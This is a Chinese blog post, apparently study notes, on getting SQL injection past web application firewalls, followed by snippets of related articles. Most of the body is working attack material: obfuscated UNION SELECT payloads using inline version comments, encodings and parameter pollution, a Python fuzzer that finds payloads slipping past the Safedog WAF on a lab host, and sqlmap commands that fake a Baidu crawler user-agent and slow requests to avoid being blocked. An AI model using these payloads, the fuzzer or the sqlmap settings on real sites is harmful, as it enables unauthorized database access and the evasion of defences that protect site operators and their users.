SQL注入之WAF绕过

最新推荐文章于 2024-08-28 13:44:19 发布
最新推荐文章于 2024-08-28 13:44:19 发布
阅读量3.3k 收藏 5
点赞数 1
分类专栏: 渗透测试 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48907714/article/details/123940741
版权

SQL注入之WAF绕过

  • 数据
  1. 大小写
  2. 加密解密
  3. 编码解码
  4. 等价函数
  5. 特殊符号
  6. 反序列化
  7. 注释符混用
  • 方式
  1. 更改提交方式
  2. 变异
  • 其他
  1. Fuzz大法
  2. 数据库特性
  3. 垃圾数据溢出
  4. HTTP参数污染
大小写关键字替换

id=1 UnioN/**/SelEct 1,user()
Hex() bin() 等价 acsii()
sleep() 等价于 benchmark()
Mid() substring()等价于 substr()
@@user 等价 user()
@@version 等价 version()

各种编码

大小写,URL hex %0A等

注释使用

//
–+
– (两个-加空格)
(#)(这里是单个#,用括号是因为会被注释了)
//
+
;%00
/!/

再次循环

union==uunionnion

等价替换

user() = @@user()
and=&
or=|
ascii=hex等

参数污染

?id=1&id=2&id=3

编码解码以及加密解密

s->%73->%25%37%33
hex,unlcode,base64等

更改请求提交方式

GET POST COOKIE
POST->multipart/from-data

中间件HTTP参数污染
数据库特性
  1. MySQL技巧
  • MySQL注释符有三种:#、/----/、-- 、…(注意–后有一个空格)
  • 空格符:[0x09,0x0a-0x0d,0x20,0xa0]
  • 特殊符号:%a 换行符
    可结合注释符使用%230a,%2d%2d%0a
  • 内联注释
    /*!Union123456Select / 1,user() //数字范围1000-50540
    /    !50000union Select */ 1,user()
    下面有与fuzz配合的 代码
    表示如果mysql版本大于5.00.00版本就执行,不被注释,如果低于则被注释
  • mysql黑魔法
    select{x username} from {x11 test.admin};
    union all%23%0a select 1,2,version()’
  1. SQL Server技巧
  • 用注释掉注释后查询的其余部分
    /* C语言风格注释
    – SQL注释(两个-加空格)
    ; 00% 空字节
  • 空白符:[0x01-0x20]
  • 特殊符号:%3a 冒号
    id=1 union;elect 1,2 from:admin
  • 函数变形:如db_name [空白字符] ()
  1. Oracle技巧
  • 注释符::–和/**/
  • 空白字符:[0x00,0x09,0x0a-0x0d,0x20]
  1. 配合FUZZ
    select * from admin where id=1 [位置一] union [位置二] select [位置三] 1,2,db_name [位置四] from [位置五] admin

注入方法
id=-1
~ ! %0A
id=-1 union // select 1,2,3 --+
id=-1 union%23a%0Aselect 1,2,3 --+
不能正常运行
id=-1 uni//on select 1,2,3 --+
d=-1 uni/**/on select 1,2,3 --+

HTTP参数污染

给多个参数如:/?id=12&23
这个时候就是看服务器会接收那个内容,如果是php/apache那么获取的就是后面的内容,如果是jsp/tomcat的话就是第一个
在这里插入图片描述
在mysql中/** select username from users*/是不能执行的,属于注释符
1/**-1 union select 1,2,3#*/

白名单

方式一:IP白名单
从网络层获取的IP一般无法伪造,如果是获取客户端的,那么存在伪造IP绕过。
伪造为百度爬虫的请求头(让WAF以为是官方的爬虫,达到绕过)

fuzz代码实现
import requests, time

url = 'http://10.1.1.120/Less-2/?id=1'
union = 'union'
select = 'select'
num = '1,2,3'
a = {'%0a', '%23'}
aa = {'x'}
aaa = {'%0a', '%23'}
b = '/*!'
c = '/*'


def bypass():
    for xiaodi in a:
        for xiaodis in aa:
            for xiaodiss in aaa:
                for two in range(44500, 44600):
                    urls = url + xiaodi + xiaodis + xiaodiss + b + str(two) + union + c + xiaodi + xiaodis + xiaodiss + select + xiaodi + xiaodis + xiaodiss + num
                    try:
                        result = requests.get(urls).text
                        len_r = len(result)
                        if (result.find('safedog') == -1):
                            # print('bypass url address:'+ urls+'|'+ str(len_r))
                            print('bypass url address:' + urls + '|' + str(len_r))
                            if len_r == 715:
                                fp = open('url,txt', 'a+')
                                fp.write(urls + '\n')
                                fp.close()
                    except Exception as err:
                        print('connecting error')
                        time.sleep(0.1)


if __name__ == '__main__':
    print('fuzz start')
    bypass()

SQLmap

sqlmap -u “http://www.xxxx.com/?id=1” --tamper=xxx.py --proxy=http://127.0.0.1:8888 --random-agent
–random-agent随机出现请求头,避免被墙(不改的话就是用默认sqlmap.org的请求头,直接就拦截了)
使用比如百度爬虫的请求头就不会被墙
在这里插入图片描述

自定义请求头
sqlmap -u “http://www.xxxx.com/?id=1” --tampper xxx.py --user-Agent=”Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)“
延时注入,避免被墙
–delay 1 每一秒注入一次

百密不疏
关注
专栏目录
44-5 waf绕过 - SQL注入WAF方法
weixin_43263566的博客
06-04 135
内联注释是一种特殊的注释格式,在其后面紧跟着数据库版本号时,如果实际的数据库版本等于或高于该字符串,则应用程序会将注释内容解释为SQL语句,否则将其视为注释处理。默认情况下,如果没有指定版本号,内联注释中的内容将会执行。首先经过测试发现安全狗并不是直接过滤 and 关键字,而是过滤 adn + 一个表达式,如:and 1=1 这种才会被过滤。如果你要使用order by进行爆列,会发现也被过滤了,绕过:使用 group by 绕过。/ 之后的注释内容则会被真正地注释掉,失去作用。
sql注入——waf绕过
cxrpty的博客
02-11 595
WafWeb应用防护系统,也叫Web防火墙,主要是对Web特有入侵方式的加强防护,如DDOS防护、SQL注入、XML注入、XSS等。 sql注入waf常用方式有以下几种: 1.大小写混合 uNIoN sELecT 1,2,3,4 2.替换关键字 selselectect 1,2,3,4 3....
SQL注入中的WAF绕过技术
weixin_33972649的博客
05-26 782
1.大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。2.简单编码绕过比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。也还有大家在Mys...
WAF BYPASS】SQL注入漏洞之WAF绕过方式探索(万种)
weixin_70940440的博客
07-30 1942
但这只是一种简单的防护措施。(注意:在 SQL 中,XOR(异或)运算符用于比较两个布尔表达式,如果两个表达式的结果不同(一个为真,一个为假),则XOR的结果为真;外部的查询SELECT * FROM users WHERE age > (子查询的结果) :从users表中选择所有年龄大于子查询计算出的平均年龄的记录,并返回所有列( * 表示所有列)。CHAR(101) 对应字符 'e',CHAR(97) 对应字符 'a',CHAR(115) 对应字符 's',CHAR(116) 对应字符 't'。
SQL 注入之 WAF 绕过
最新发布
2301_77160226的博客
08-28 992
SQL 注入攻击是一种严重的安全威胁,而 WAF 是防范 SQL 注入攻击的重要手段之一。然而,攻击者也在不断寻找方法来绕过 WAF,从而成功实施 SQL 注入攻击。为了防范 WAF 绕过,我们需要采取持续更新 WAF 规则、多层面防御、安全培训和定期安全审计等措施,形成一个强大的安全防护体系,保护 Web 应用程序的安全。同时,我们也需要不断关注网络安全领域的最新动态,及时了解新的攻击技术和防范方法,以提高我们的安全防护能力。
sql注入篇--绕过WAF
qq_51003021的博客
08-12 2137
针对WAF绕过
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAFWeb Application Firewall)的常见特征是指其具有审计...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入WAF小结
05-08
本文将对几种常见的SQL注入绕过WAF的方法进行详细说明。 #### 二、SQL注入类型 1. **GET注入**:通常发生在URL查询参数中。 2. **POST注入**:发生在HTTP POST请求的数据体中。 3. **COOKIE注入**:利用Cookie中的...
sql注入笔记2(WAF绕过
qq_63527808的博客
04-11 788
2、宽字节注入:如果数据库使用的的是GBK编码而PHP编码为UTF8就可能出现注入问题,原因是程序员为了防止SQL注入,就会调用我们上面所介绍的几种函数,将单引号或双引号进行转义操作,转义无非便是在单或双引号前加上斜杠(\)进行转义 ,但这样并非安全,因为数据库使用的是宽字节编码,两个连在一起的字符会被当做是一个汉字,而在PHP使用的UTF8编码则认为是两个独立的字符,如果我们在单或双引号前添加一个字符,使其和斜杠(\)组合被当作一个汉字,从而保留单或双引号,使其发挥应用的作用。
SQL注入绕过WAF
weixin_42581003的博客
01-14 571
SQL注入绕过WAF的方法有很多种,其中一些常见的方法包括: 使用URL编码来隐藏特殊字符,例如将“'”编码为“%27”。 使用多语句查询来绕过WAF,例如将“;”替换为“%3b”。 使用不常见的SQL关键字来绕过WAF,例如使用“version()”代替“@@version”。 使用无用代码来混淆真正的SQL语句,例如在SQL语句中添加多余的空格和注释。 使用已知的WAF绕过技巧来绕过WAF,...
SQL注入WAF绕过注入
weixin_54105551的博客
07-03 2656
本文主要讲的是如何绕过WAF的基础知识,写的不好,请多多见谅。
SQL注入WAF绕过
热门推荐
xdjxi的博客
03-14 1万+
SQL注入WAF绕过的基本方法 WAF绕过 WAF(Web Application Firewall)的中文名称叫做“Web应用防火墙”,它依罪女全策略对Web应用程序进行保护。安全策略是WAF的灵魂,所谓的“绕过WAF”就是指通过某种方式无视WAF安全策略,达到攻击的目的。 方法1:变换大小写 实例:比如WAF拦截了union,那就使用Union、UnloN等方式绕过。 方法2:编码 实例1:WAF检测敏感字'~,则可以用Ox7e代替,如extractvalue(1 ,concat('~.
SQL注入篇——WAf绕过
爱国小白帽
02-11 1694
WAF是什么? Web应用防护系统(也称:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。也叫Web防火墙,主要是对Web特有入侵方式的加强防护,如DDOS防护、SQL注入、XML注入、XSS等。 Waf分类 代码WAF 软件WAF 硬件WAFWAF Sql注入waf常用方式 大小写混合 uNIoN sELecT 1,2,3,4 2...
sql注入关于waf绕过
qq_43511094的博客
03-09 1133
sql注入关于waf绕过关于Waf绕过可大致分为三类:一、白盒绕过二、黑盒绕过1、架构层面绕过waf1.1、寻找源网站绕过waf检测1.2、通过同网段绕过waf防护2、资源限制角度绕过waf3、协议层面绕过waf3.1、协议为覆盖绕过waf3.2、参数污染4、规则层面绕过4.1、sql注释符绕过4.2、空白符绕过4.3、函数分隔符号4.4、浮点数词法解释4.5、利用error-based进行sql注入4.6、mysql特殊语法4.7、大小写绕过4.8、关键字重复4.9、关键字替换三、模糊测试 提示:以下
SQL注入(四)WAF绕过
shirlly_的博客
04-11 471
WAF绕过
sql注入及其waf绕过
06-07
SQL注入是指攻击者通过在Web应用程序的输入参数中插入恶意SQL语句,以执行未经授权的操作。攻击者可以利用SQL注入漏洞来窃取敏感数据,修改数据库中的数据或者执行其他恶意行为。为了防止SQL注入攻击,Web应用程序通常会使用一些安全措施,例如WAFWeb应用程序防火墙)。 WAF是一个位于Web应用程序和互联网之间的设备或软件,用于监视和过滤Web应用程序的输入和输出流量,以保护Web应用程序免受各种攻击。WAF通常使用正则表达式等技术来检测恶意输入,并拦截可疑请求。然而,攻击者可以使用一些技术来绕过WAF,例如使用编码、分段、多个请求等方式来绕过WAF的检测。 为了防止SQL注入攻击和WAF绕过,开发人员应该采取以下措施: 1. 使用参数化查询或预处理语句来防止SQL注入攻击。 2. 对输入进行过滤和验证,以防止恶意输入。 3. 对敏感数据进行加密和哈希处理。 4. 使用最新版本的WAF,并配置正确的规则集。 5. 定期对Web应用程序进行安全审计和漏洞扫描。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值